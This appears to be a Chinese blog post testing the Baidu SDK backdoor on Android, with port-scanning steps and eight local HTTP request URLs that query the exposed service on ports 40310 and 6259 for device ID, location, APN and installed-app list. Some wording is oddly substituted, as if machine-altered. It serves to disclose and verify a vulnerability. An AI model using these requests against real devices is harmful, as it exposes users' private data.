本次这个安卓后门真是哔了狗了，刚参加大安卓阵营就出了这个篓子，跟你root不root和什么安卓版别没有版毛钱联系，完全是百度SDK官方供给的后门，不是缝隙，人为的。

乌云地址： http://drops.wooyun.org/papers/10061

后门端口：40310/6259

本次测验在Ubuntu下，详细adb调试东西参阅 sink_cup的博客http://www.cnblogs.com/sink_cup/archive/2011/10/31/ubuntu_x64_android_sdk_java.html

lsu *** 检查u *** 设备

下载SDK实在太慢了 抛弃，上端口扫描

装置 zenmap

扫描端口

估量上面几个端口是华为体系的自带端口（期望不要有坑）

装置手机百度APP 再扫描一遍

没有发现，APP现已更新掉了，换个蚂蚁短租 APP

HTTP 恳求下

详细获取资源的恳求链接如下：

服务查询

'http://127.0.0.1:40310/getcuid?secret=0&mcmdf=inapp_',

'http://127.0.0.1:40310/geolocation?mcmdf=inapp_',

'http://127.0.0.1:40310/getapn?mcmdf=inapp_',

'http://127.0.0.1:40310/getapplist?mcmdf=inapp_',

'http://127.0.0.1:6259/getcuid?secret=0&mcmdf=inapp_',

'http://127.0.0.1:6259/geolocation?mcmdf=inapp_',

'http://127.0.0.1:6259/getapn?mcmdf=inapp_',

'http://127.0.0.1:6259/getapplist?mcmdf=inapp_'

搜着搜着忽然发现 V2EX两个月前的一个帖子

http://cn.v2ex.com/t/218539